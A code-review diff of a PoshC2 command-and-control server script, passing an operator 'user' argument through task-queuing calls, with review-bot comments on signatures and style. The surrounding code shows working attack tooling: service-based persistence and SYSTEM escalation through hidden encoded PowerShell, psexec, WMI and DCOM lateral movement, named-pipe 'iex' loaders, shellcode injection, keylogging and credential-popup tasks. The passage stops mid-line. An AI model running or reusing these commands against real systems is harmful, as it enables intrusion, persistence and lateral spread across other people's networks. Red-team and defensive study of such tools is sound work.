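Review bot: `def startup(user, printhelp = ""):` makes `user` a required first positional, so any caller this patch missed that still does `startup("some message")` no longer errors; the message is shown as `User: some message` and the help text is lost. Keeping the existing parameter first and adding the new one as a keyword, `def startup(printhelp="", user=None):` with call sites written `startup(user=user)` / `startup(msg, user=user)`, keeps such calls correct. The hunk also leaves a blank line between the new `def` and its `try:` and only one blank line after `migrate`'s last statement, where PEP 8 wants two before a top-level `def` and none after it. `startup`'s body runs past this hunk.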
@@ -256,55 +261,55 @@ def startup(printhelp = ""): generate_table("Implants") graphviz() time.sleep(1) - startup() + startup(user) if ("show-urls" in implant_id.lower()) or ("list-urls" in implant_id.lower()): urls = get_c2urls() urlformatted = "RandomID URL HostHeader ProxyURL ProxyUsername ProxyPassword CredentialExpiry\n" for i in urls: urlformatted += "%s %s %s %s %s %s %s %s \n" % (i[0],i[1],i[2],i[3],i[4],i[5],i[6],i[7]) - startup(urlformatted) + startup(user, urlformatted) if "add-autorun" in implant_id.lower(): autorun = (implant_id.lower()).replace("add-autorun ","") autorun = autorun.replace("add-autorun","") add_autorun(autorun) - startup("add-autorun: %s\r\n" % autorun) + startup(user, "add-autorun: %s\r\n" % autorun) if "list-autorun" in implant_id.lower(): autoruns = get_autorun() - startup(autoruns) + startup(user, autoruns) if "del-autorun" in implant_id.lower(): autorun = (implant_id.lower()).replace("del-autorun ","") del_autorun(autorun) - startup("deleted autorun\r\n") + startup(user, "deleted autorun\r\n") if "nuke-autorun" in implant_id.lower(): del_autoruns() - startup("nuked autoruns\r\n") + startup(user, "nuked autoruns\r\n") if (implant_id.lower() == "automigrate-frompowershell") or (implant_id.lower() == "am"): - startup("automigrate not currently implemented for the Python version of PoshC2\r\n") + startup(user, "automigrate not currently implemented for the Python version of PoshC2\r\n") if "show-serverinfo" in implant_id.lower(): i = get_c2server_all() detailsformatted = "\nHostnameIP: %s\nEncKey: %s\nDomainFrontHeader: %s\nDefaultSleep: %s\nKillDate: %s\nHTTPResponse: %s\nFolderPath: %s\nServerPort: %s\nQuickCommand: %s\nDefaultProxyURL: %s\nDefaultProxyUser: %s\nDefaultProxyPass: %s\nEnableSounds: %s\nAPIKEY: %s\nMobileNumber: %s\nURLS: %s\n%sSocksURLS: %s\nInsecure: %s\nUserAgent: %s\nReferer: %s\nAPIToken: %s\nAPIUser: %s\nEnableNotifications: %s" % 
(i[1],i[2],i[3],i[4],i[5],i[6],i[7],i[8],i[9],i[10],i[11],i[12],i[13],i[14],i[15],i[16],i[17],i[18],i[19],i[20],i[21],i[22],i[23],i[24]) - startup(detailsformatted) + startup(user, detailsformatted) if "turnoff-notifications" in implant_id.lower(): update_item("EnableNotifications", "C2Server", "No") - startup("Turned off notifications on new implant") + startup(user, "Turned off notifications on new implant") if "turnon-notifications" in implant_id.lower(): update_item("EnableNotifications", "C2Server", "Yes") - startup("Turned on notifications on new implant") + startup(user, "Turned on notifications on new implant") if "set-clockworksmsapikey" in implant_id.lower(): cmd = (implant_id.lower()).replace("set-clockworksmsapikey ","") cmd = cmd.replace("set-clockworksmsapikey","") update_item("MobileNumber", "C2Server", cmd) - startup("Updated set-clockworksmsapikey: %s\r\n" % cmd) + startup(user, "Updated set-clockworksmsapikey: %s\r\n" % cmd) if "set-clockworksmsnumber" in implant_id.lower(): cmd = (implant_id.lower()).replace("set-clockworksmsnumber ","") cmd = cmd.replace("set-clockworksmsnumber","") update_item("APIKEY", "C2Server", cmd) - startup("Updated set-clockworksmsnumber (Restart C2 Server): %s\r\n" % cmd) + startup(user, "Updated set-clockworksmsnumber (Restart C2 Server): %s\r\n" % cmd) if "set-defaultbeacon" in implant_id.lower(): cmd = (implant_id.lower()).replace("set-defaultbeacon ","") cmd = cmd.replace("set-defaultbeacon","") update_item("DefaultSleep", "C2Server", cmd) - startup("Updated set-defaultbeacon (Restart C2 Server): %s\r\n" % cmd) + startup(user, "Updated set-defaultbeacon (Restart C2 Server): %s\r\n" % cmd) if "opsec" in implant_id.lower(): implants = get_implants_all() comtasks = get_tasks() 
@@ -332,38 +337,38 @@ def startup(printhelp = ""): line = line.replace('\r','') filenameuploaded = line.rstrip().split(":",1)[1] uploads += "%s %s \n" % (hostname[3], filenameuploaded) - startup("Users Compromised: \n%s\nHosts Compromised: \n%s\nURLs: \n%s\nFiles Uploaded: \n%s" % (users, hosts, urls, uploads)) + startup(user, "Users Compromised: \n%s\nHosts Compromised: \n%s\nURLs: \n%s\nFiles Uploaded: \n%s" % (users, hosts, urls, uploads)) if "listmodules" in implant_id.lower(): mods = "" for modname in os.listdir("%s/Modules/" % POSHDIR): mods += "%s\r\n" % modname - startup(mods) + startup(user, mods) if "creds" in implant_id.lower(): - startup("creds module not implemented yet") + startup(user, "creds module not implemented yet") if (implant_id.lower() == "pwnself" ) or (implant_id.lower() == "p"): subprocess.Popen(["python", "%s%s" % (PayloadsDirectory, "py_dropper.py")]) - startup() + startup(user) if (implant_id.lower() == "tasks" ) or (implant_id.lower() == "tasks "): alltasks = "" - tasks = get_nettasks_all() + tasks = get_newtasks_all() if tasks is None: - startup("No tasks queued!\r\n") + startup(user, "No tasks queued!\r\n") else: for task in tasks: imname = get_implantdetails(task[1]) alltasks += "(%s) %s\r\n" % ("%s\\%s" % (imname[11],imname[2]),task[2]) - startup("Queued tasks:\r\n\r\n%s" % alltasks) + startup(user, "Queued tasks:\r\n\r\n%s" % alltasks) if (implant_id.lower() == "cleartasks" ) or (implant_id.lower() == "cleartasks "): - drop_nettasks() - startup("Empty tasks queue\r\n") + drop_newtasks() + startup(user, "Empty tasks queue\r\n") if "quit" in implant_id.lower(): ri = raw_input("Are you sure you want to quit? (Y/n) ") if ri.lower() == "n": - startup() + startup(user) if ri == "": sys.exit(0) if ri.lower() == "y": 
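Review bot: The `tasks` listing built from `get_newtasks_all()` still prints only `task[2]` (the command) per row, so the user recorded by this patch is never shown to the operator who is looking at the queue. If `get_newtasks_all` selects every column (it is outside this hunk, so the index is presumed), the new field is `task[3]` and the line becomes `alltasks += "(%s) [%s] %s\r\n" % ("%s\\%s" % (imname[11],imname[2]), task[3], task[2])`. Rows queued while `LogUsers` is off would presumably show `None` here, which is worth handling with a fallback label.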
@@ -379,26 +384,26 @@ def startup(printhelp = ""): createnewpayload() if (implant_id == "?") or (implant_id == "help"): - startup(pre_help) + startup(user, pre_help) if (implant_id.lower() == "history") or implant_id.lower() == "history ": - startup(get_history()) + startup(user, get_history()) if "use " in implant_id.lower(): implant_id = implant_id.replace("use ","") params = re.compile("use ", re.IGNORECASE) implant_id = params.sub("", implant_id) - commandloop(implant_id) + commandloop(implant_id, user) except Exception as e: if 'unable to open database file' in e: - startup() + startup(user) else: traceback.print_exc() print ("Error: %s" % e) print ("Currently no valid implants: sleeping for 10 seconds") time.sleep(10) - startup() + startup(user) def runcommand(command, randomuri): if command: @@ -439,12 +444,12 @@ def runcommand(command, randomuri): sleep = '$sleeptime = %s' % command update_sleep(command, randomuri) - new_task(sleep, randomuri) + new_task(sleep, user, randomuri) elif (command.lower().startswith('label-implant')): label = command.replace('label-implant ', '') update_label(label, randomuri) - startup() + startup(user) elif "searchhelp" in command.lower(): searchterm = (command.lower()).replace("searchhelp ","") @@ -461,7 +466,7 @@ def runcommand(command, randomuri): kill_implant(randomuri) elif command.lower() == 'sai' or command.lower() == 'sai ': - new_task('startanotherimplant', randomuri) + new_task('startanotherimplant', user, randomuri) elif "upload-file" in command.lower(): source = "" 
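Review bot: `runcommand` reads `user` without receiving it: the signature `def runcommand(command, randomuri):` is unchanged in this hunk while the new `new_task(sleep, user, randomuri)` and `startup(user)` lines reference it, so it presumably resolves to the module-level `user` assigned in the `__main__` block and raises NameError if the module is imported or `runcommand` is called any other way. Passing it explicitly keeps attribution tied to the session instead of a global: `def runcommand(command, randomuri, user=None):` here, and `runcommand(command, implant_id, user)` in commandloop, whose call site is left unchanged in the commandloop hunk. The same point applies to every later `runcommand` hunk in this file that adds `user` to a `new_task`, `check_module_loaded`, `run_autoloads` or `startup` call. runcommand's body starts before and continues after this hunk.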
@@ -499,16 +504,16 @@ def runcommand(command, randomuri): elif "loadmoduleforce" in command.lower(): params = re.compile("loadmoduleforce ", re.IGNORECASE) params = params.sub("", command) - check_module_loaded(params, randomuri, force=True) + check_module_loaded(params, randomuri, user, force=True) elif "loadmodule" in command.lower(): params = re.compile("loadmodule ", re.IGNORECASE) params = params.sub("", command) - check_module_loaded(params, randomuri) + check_module_loaded(params, randomuri, user) elif 'get-screenshot' in command.lower(): taskcmd = "screencapture -x /tmp/s;base64 /tmp/s;rm /tmp/s" - new_task(taskcmd, randomuri) + new_task(taskcmd, user, randomuri) elif "kill-implant" in command.lower() or "exit" in command.lower(): impid = get_implantdetails(randomuri) @@ -517,15 +522,15 @@ def runcommand(command, randomuri): print ("Implant not terminated") if ri == "": pid = get_pid(randomuri) - new_task("kill -9 %s" % pid,randomuri) + new_task("kill -9 %s" % pid, user, randomuri) kill_implant(randomuri) if ri.lower() == "y": pid = get_pid(randomuri) - new_task("kill -9 %s" % pid,randomuri) + new_task("kill -9 %s" % pid, user, randomuri) kill_implant(randomuri) elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "): - startup() + startup(user) elif "linuxprivchecker" in command.lower(): params = re.compile("linuxprivchecker", re.IGNORECASE) 
@@ -533,16 +538,16 @@ def runcommand(command, randomuri): module = open("%slinuxprivchecker.py" % ModulesDirectory, 'r').read() encoded_module = base64.b64encode(module) taskcmd = "linuxprivchecker -pycode %s %s" % (encoded_module, params) - new_task(taskcmd, randomuri) + new_task(taskcmd, user, randomuri) else: if command: - new_task(command, randomuri) + new_task(command, user, randomuri) return elif implant_type == "C#": try: - check_module_loaded("Core.exe", randomuri) + check_module_loaded("Core.exe", randomuri, user) except Exception as e: print ("Error loading Core.exe: %s" % e) @@ -582,7 +587,7 @@ def runcommand(command, randomuri): print ("") print ("Uploading %s to %s" % (source, destination)) uploadcommand = "upload-file%s;\"%s\"" % (sourceb64, destination) - new_task(uploadcommand, randomuri) + new_task(uploadcommand, user, randomuri) else: print("Source file could not be read or was empty") except Exception as e: @@ -603,7 +608,7 @@ def runcommand(command, randomuri): shellcodefile = load_file(path) if shellcodefile != None: arch = "64" - new_task("run-exe Core.Program Core Inject-Shellcode %s%s" % (base64.b64encode(shellcodefile),params), randomuri) + new_task("run-exe Core.Program Core Inject-Shellcode %s%s" % (base64.b64encode(shellcodefile),params), user, randomuri) except Exception as e: print ("Error loading file: %s" % e) 
@@ -613,82 +618,82 @@ def runcommand(command, randomuri): if ri.lower() == "n": print ("Implant not terminated") if ri == "": - new_task("exit",randomuri) + new_task("exit", user, randomuri) kill_implant(randomuri) if ri.lower() == "y": - new_task("exit",randomuri) + new_task("exit",user, randomuri) kill_implant(randomuri) elif "seatbelt " in command.lower(): - check_module_loaded("Seatbelt.exe", randomuri) - new_task(command,randomuri) + check_module_loaded("Seatbelt.exe", randomuri, user) + new_task(command, user, randomuri) elif (command.lower().startswith("stop-keystrokes")): - new_task("run-exe Core.Program Core %s" % command,randomuri) + new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("get-keystrokes")): - new_task("run-exe Core.Program Core %s" % command,randomuri) + new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("get-screenshotmulti")): - new_task(command,randomuri) + new_task(command, user, randomuri) elif (command.lower().startswith("get-screenshot")): - new_task("run-exe Core.Program Core %s" % command,randomuri) + new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("arpscan")): - new_task("run-exe Core.Program Core %s" % command,randomuri) + new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("testadcredential")): - new_task("run-exe Core.Program Core %s" % command,randomuri) + new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("testlocalcredential")): - new_task("run-exe Core.Program Core %s" % command,randomuri) + new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("turtle")): - new_task("run-exe Core.Program Core %s" % command,randomuri) + new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif 
(command.lower().startswith("get-userinfo")): - new_task("run-exe Core.Program Core %s" % command,randomuri) + new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("get-content")): - new_task("run-exe Core.Program Core %s" % command,randomuri) + new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("resolvednsname")): - new_task("run-exe Core.Program Core %s" % command,randomuri) + new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("resolveip")): - new_task("run-exe Core.Program Core %s" % command,randomuri) + new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("cred-popper")): - new_task("run-exe Core.Program Core %s" % command,randomuri) + new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("get-serviceperms")): - new_task("run-exe Core.Program Core %s" % command,randomuri) + new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("move")): - new_task("run-exe Core.Program Core %s" % command,randomuri) + new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("delete")): - new_task("run-exe Core.Program Core %s" % command,randomuri) + new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("ls")): - new_task("run-exe Core.Program Core %s" % command,randomuri) + new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower() == "pwd") or (command.lower() == "pwd "): - new_task("run-exe Core.Program Core pwd",randomuri) + new_task("run-exe Core.Program Core pwd", user, randomuri) elif (command.lower() == "ps") or (command.lower() == "ps "): - new_task("run-exe Core.Program Core Get-ProcessList",randomuri) + new_task("run-exe Core.Program Core Get-ProcessList", user, 
randomuri) elif "loadmoduleforce" in command.lower(): params = re.compile("loadmoduleforce ", re.IGNORECASE) params = params.sub("", command) - check_module_loaded(params, randomuri, force=True) + check_module_loaded(params, randomuri, user, force=True) elif "loadmodule" in command.lower(): params = re.compile("loadmodule ", re.IGNORECASE) params = params.sub("", command) - check_module_loaded(params, randomuri) + check_module_loaded(params, randomuri, user) elif "listmodules" in command.lower(): modules = os.listdir("%s/Modules/" % POSHDIR) @@ -698,7 +703,7 @@ def runcommand(command, randomuri): for mod in modules: if (".exe" in mod) or (".dll" in mod) : print (mod) - new_task(command,randomuri) + new_task(command, user, randomuri) elif "modulesloaded" in command.lower(): ml = get_implantdetails(randomuri) @@ -708,10 +713,10 @@ def runcommand(command, randomuri): print (sharp_help1) elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "): - startup() + startup(user) elif ('beacon' in command.lower() and '-beacon' not in command.lower()) or 'set-beacon' in command.lower() or 'setbeacon' in command.lower(): - new_task(command, randomuri) + new_task(command, user, randomuri) command = command.replace('set-beacon ', '') command = command.replace('setbeacon ', '') command = command.replace('beacon ', '') @@ -720,20 +725,20 @@ def runcommand(command, randomuri): elif (command.lower().startswith('label-implant')): label = command.replace('label-implant ', '') update_label(label, randomuri) - startup() + startup(user) else: if command: - new_task(command, randomuri) + new_task(command, user, randomuri) return else: try: - check_module_loaded("Core.ps1", randomuri) + check_module_loaded("Core.ps1", randomuri, user) except Exception as e: print ("Error loading Core.ps1: %s" % e) - run_autoloads(command, randomuri) + run_autoloads(command, randomuri, user) # alias mapping for alias in ps_alias: 
@@ -755,7 +760,7 @@ def runcommand(command, randomuri): command = command if ('beacon' in command.lower() and '-beacon' not in command.lower()) or 'set-beacon' in command.lower() or 'setbeacon' in command.lower(): - new_task(command, randomuri) + new_task(command, user, randomuri) command = command.replace('set-beacon ', '') command = command.replace('setbeacon ', '') command = command.replace('beacon ', '') @@ -764,7 +769,7 @@ def runcommand(command, randomuri): elif (command.lower().startswith('label-implant')): label = command.replace('label-implant ', '') update_label(label, randomuri) - startup() + startup(user) elif "searchhelp" in command.lower(): searchterm = (command.lower()).replace("searchhelp ","") @@ -775,19 +780,19 @@ def runcommand(command, randomuri): print (line) elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "): - startup() + startup(user) elif "install-servicelevel-persistencewithproxy" in command.lower(): C2 = get_c2server_all() if C2[11] == "": - startup("Need to run createproxypayload first") + startup(user, "Need to run createproxypayload first") else: newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13], C2[11], "", "", C2[19], C2[20], C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload) - new_task(cmd, randomuri) + new_task(cmd, user, randomuri) elif "install-servicelevel-persistence" in command.lower(): C2 = get_c2server_all() 
@@ -796,30 +801,30 @@ def runcommand(command, randomuri): C2[21], get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload) - new_task(cmd, randomuri) + new_task(cmd, user, randomuri) elif "remove-servicelevel-persistence" in command.lower(): - new_task("sc.exe delete CPUpdater", randomuri) + new_task("sc.exe delete CPUpdater", user, randomuri) # psexec lateral movement elif "get-implantworkingdirectory" in command.lower(): - new_task("pwd", randomuri) + new_task("pwd", user, randomuri) elif "get-system-withproxy" in command.lower(): C2 = get_c2server_all() if C2[11] == "": - startup("Need to run createproxypayload first") + startup(user, "Need to run createproxypayload first") else: newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13], C2[11], "", "", C2[19], C2[20], C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceModule start= auto" % payload - new_task(cmd, randomuri) + new_task(cmd, user, randomuri) cmd = "sc.exe start CPUpdaterMisc" - new_task(cmd, randomuri) + new_task(cmd, user, randomuri) cmd = "sc.exe delete CPUpdaterMisc" - new_task(cmd, randomuri) + new_task(cmd, user, randomuri) elif "get-system-withdaisy" in command.lower(): C2 = get_c2server_all() 
@@ -827,11 +832,11 @@ def runcommand(command, randomuri): if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))): with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read() cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c %s' Displayname= CheckpointServiceModule start= auto" % payload - new_task(cmd, randomuri) + new_task(cmd, user, randomuri) cmd = "sc.exe start CPUpdaterMisc" - new_task(cmd, randomuri) + new_task(cmd, user, randomuri) cmd = "sc.exe delete CPUpdaterMisc" - new_task(cmd, randomuri) + new_task(cmd, user, randomuri) elif "get-system" in command.lower(): C2 = get_c2server_all() 
@@ -840,46 +845,46 @@ def runcommand(command, randomuri): C2[21], get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceModule start= auto" % payload - new_task(cmd, randomuri) + new_task(cmd, user, randomuri) cmd = "sc.exe start CPUpdaterMisc" - new_task(cmd, randomuri) + new_task(cmd, user, randomuri) cmd = "sc.exe delete CPUpdaterMisc" - new_task(cmd, randomuri) + new_task(cmd, user, randomuri) elif "quit" in command.lower(): ri = raw_input("Are you sure you want to quit? (Y/n) ") if ri.lower() == "n": - startup() + startup(user) if ri == "": sys.exit(0) if ri.lower() == "y": sys.exit(0) elif "invoke-psexecproxypayload" in command.lower(): - check_module_loaded("Invoke-PsExec.ps1", randomuri) + check_module_loaded("Invoke-PsExec.ps1", randomuri, user) if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))): with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read() params = re.compile("invoke-psexecproxypayload ", re.IGNORECASE) params = params.sub("", command) cmd = "invoke-psexec %s -command \"%s\"" % (params,payload) - new_task(cmd, randomuri) + new_task(cmd, user, randomuri) else: - startup("Need to run createproxypayload first") + startup(user, "Need to run createproxypayload first") elif "invoke-psexecdaisypayload" in command.lower(): - check_module_loaded("Invoke-PsExec.ps1", randomuri) + check_module_loaded("Invoke-PsExec.ps1", randomuri, user) daisyname = raw_input("Payload name required: ") if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))): with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read() params = re.compile("invoke-psexecdaisypayload ", re.IGNORECASE) params = params.sub("", command) cmd = "invoke-psexec %s -command \"%s\"" % (params,payload) - new_task(cmd, randomuri) + 
new_task(cmd, user, randomuri) else: - startup("Need to run createdaisypayload first") + startup(user, "Need to run createdaisypayload first") elif "invoke-psexecpayload" in command.lower(): - check_module_loaded("Invoke-PsExec.ps1", randomuri) + check_module_loaded("Invoke-PsExec.ps1", randomuri, user) C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "", "", "", "", "", C2[19], C2[20], 
@@ -888,35 +893,35 @@ def runcommand(command, randomuri): params = re.compile("invoke-psexecpayload ", re.IGNORECASE) params = params.sub("", command) cmd = "invoke-psexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params,payload) - new_task(cmd, randomuri) + new_task(cmd, user, randomuri) # wmi lateral movement elif "invoke-wmiproxypayload" in command.lower(): - check_module_loaded("Invoke-WMIExec.ps1", randomuri) + check_module_loaded("Invoke-WMIExec.ps1", randomuri, user) if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))): with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read() params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE) params = params.sub("", command) cmd = "invoke-wmiexec %s -command \"%s\"" % (params,payload) - new_task(cmd, randomuri) + new_task(cmd, user, randomuri) else: - startup("Need to run createproxypayload first") + startup(user, "Need to run createproxypayload first") elif "invoke-wmidaisypayload" in command.lower(): - check_module_loaded("Invoke-WMIExec.ps1", randomuri) + check_module_loaded("Invoke-WMIExec.ps1", randomuri, user) daisyname = raw_input("Name required: ") if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))): with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read() params = re.compile("invoke-wmidaisypayload ", re.IGNORECASE) params = params.sub("", command) cmd = "invoke-wmiexec %s -command \"%s\"" % (params,payload) - new_task(cmd, randomuri) + new_task(cmd, user, randomuri) else: - startup("Need to run createdaisypayload first") + startup(user, "Need to run createdaisypayload first") elif "invoke-wmipayload" in command.lower(): - check_module_loaded("Invoke-WMIExec.ps1", randomuri) + check_module_loaded("Invoke-WMIExec.ps1", randomuri, user) C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "", "", "", "", "", C2[19], C2[20], 
@@ -925,7 +930,7 @@ def runcommand(command, randomuri): params = re.compile("invoke-wmipayload ", re.IGNORECASE) params = params.sub("", command) cmd = "invoke-wmiexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params,payload) - new_task(cmd, randomuri) + new_task(cmd, user, randomuri) # dcom lateral movement @@ -937,9 +942,9 @@ def runcommand(command, randomuri): p = re.compile(ur'(?<=-target.).*') target = re.search(p, command).group() pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c %s\",\"7\")" % (target,payload) - new_task(pscommand, randomuri) + new_task(pscommand, user, randomuri) else: - startup("Need to run createproxypayload first") + startup(user, "Need to run createproxypayload first") elif "invoke-dcomdaisypayload" in command.lower(): daisyname = raw_input("Name required: ") @@ -948,9 +953,9 @@ def runcommand(command, randomuri): p = re.compile(ur'(?<=-target.).*') target = re.search(p, command).group() pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload) - new_task(pscommand, randomuri) + new_task(pscommand, user, randomuri) else: - startup("Need to run createdaisypayload first") + startup(user, "Need to run createdaisypayload first") elif "invoke-dcompayload" in command.lower(): C2 = get_c2server_all() 
@@ -961,7 +966,7 @@ def runcommand(command, randomuri): p = re.compile(ur'(?<=-target.).*') target = re.search(p, command).group() pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload) - new_task(pscommand, randomuri) + new_task(pscommand, user, randomuri) # runas payloads 
@@ -969,44 +974,44 @@ def runcommand(command, randomuri): daisyname = raw_input("Name required: ") if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))): with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read() - new_task("$proxypayload = \"%s\"" % payload, randomuri) - check_module_loaded("Invoke-RunAs.ps1", randomuri) - check_module_loaded("NamedPipeDaisy.ps1", randomuri) + new_task("$proxypayload = \"%s\"" % payload, user, randomuri) + check_module_loaded("Invoke-RunAs.ps1", randomuri, user) + check_module_loaded("NamedPipeDaisy.ps1", randomuri, user) params = re.compile("invoke-runasdaisypayload ", re.IGNORECASE) params = params.sub("", command) pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSDaisy'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();" pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params,base64.b64encode(pipe.encode('UTF-16LE'))) - new_task(pscommand, randomuri) + new_task(pscommand, user, randomuri) else: - startup("Need to run createdaisypayload first") + startup(user, "Need to run createdaisypayload first") elif "invoke-runasproxypayload" in command.lower(): C2 = get_c2server_all() if C2[11] == "": - startup("Need to run createproxypayload first") + startup(user, "Need to run createproxypayload first") else: newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13], C2[11], "", "", C2[19], C2[20], C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() proxyvar = "$proxypayload = \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % payload - new_task(proxyvar, randomuri) - check_module_loaded("Invoke-RunAs.ps1", randomuri) - check_module_loaded("NamedPipeProxy.ps1", randomuri) + new_task(proxyvar, user, randomuri) + check_module_loaded("Invoke-RunAs.ps1", 
randomuri, user) + check_module_loaded("NamedPipeProxy.ps1", randomuri, user) params = re.compile("invoke-runasproxypayload ", re.IGNORECASE) params = params.sub("", command) pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSProxy'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();" pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params,base64.b64encode(pipe.encode('UTF-16LE'))) - new_task(pscommand, randomuri) + new_task(pscommand, user, randomuri) elif "invoke-runaspayload" in command.lower(): - check_module_loaded("Invoke-RunAs.ps1", randomuri) - check_module_loaded("NamedPipe.ps1", randomuri) + check_module_loaded("Invoke-RunAs.ps1", randomuri, user) + check_module_loaded("NamedPipe.ps1", randomuri, user) params = re.compile("invoke-runaspayload ", re.IGNORECASE) params = params.sub("", command) pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMS'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();" pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params,base64.b64encode(pipe.encode('UTF-16LE'))) - new_task(pscommand, randomuri) + new_task(pscommand, user, randomuri) elif command.lower() == "help" or command == "?" or command.lower() == "help ": print (posh_help) @@ -1060,7 +1065,7 @@ def runcommand(command, randomuri): uploadcommand = "Upload-File -Destination \"%s\" -NotHidden %s -Base64 %s" % (destination, nothidden, sourceb64) else: uploadcommand = "Upload-File -Destination \"%s\" -Base64 %s" % (destination, sourceb64) - new_task(uploadcommand, randomuri) + new_task(uploadcommand, user, randomuri) else: print("Source file could not be read or was empty") except Exception as e: 
@@ -1073,10 +1078,10 @@ def runcommand(command, randomuri): if ri.lower() == "n": print ("Implant not terminated") if ri == "": - new_task("exit", randomuri) + new_task("exit", user, randomuri) kill_implant(randomuri) if ri.lower() == "y": - new_task("exit", randomuri) + new_task("exit", user, randomuri) kill_implant(randomuri) elif "unhide-implant" in command.lower(): @@ -1093,24 +1098,24 @@ def runcommand(command, randomuri): elif "loadmoduleforce" in command.lower(): params = re.compile("loadmoduleforce ", re.IGNORECASE) params = params.sub("", command) - check_module_loaded(params, randomuri, force=True) + check_module_loaded(params, randomuri, user, force=True) elif "loadmodule" in command.lower(): params = re.compile("loadmodule ", re.IGNORECASE) params = params.sub("", command) - check_module_loaded(params, randomuri) + check_module_loaded(params, randomuri, user) elif "invoke-daisychain" in command.lower(): - check_module_loaded("Invoke-DaisyChain.ps1", randomuri) + check_module_loaded("Invoke-DaisyChain.ps1", randomuri, user) urls = get_allurls() - new_task("%s 